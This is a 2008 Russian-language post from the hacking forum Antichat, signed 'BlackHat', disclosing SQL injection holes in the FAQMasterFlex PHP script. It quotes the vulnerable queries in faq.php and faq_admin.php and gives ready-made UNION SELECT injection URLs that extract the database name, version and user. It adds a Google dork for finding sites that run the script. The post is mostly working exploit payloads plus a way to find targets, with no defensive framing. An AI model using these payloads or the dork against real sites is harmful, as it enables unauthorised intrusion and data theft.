12.12.2008, 00:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Уязвимости FAQMasterFlex
[Уязвимости FAQMasterFlex] Условие: magic_quotes_gpc = OFF
1.
File:faq.php
Уязвимый кусок кода:
PHP код:
$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error());
SQL иньекция:
Код:
http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*
2.
File:faq_admin.php
Уязвимый кусок кода:
PHP код:
$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error());
SQL иньекция:
Код:
http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name=
Google dork:"Powered by Lethal Penguin."
http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
__________________
BlackHat. MoDL
|
|
|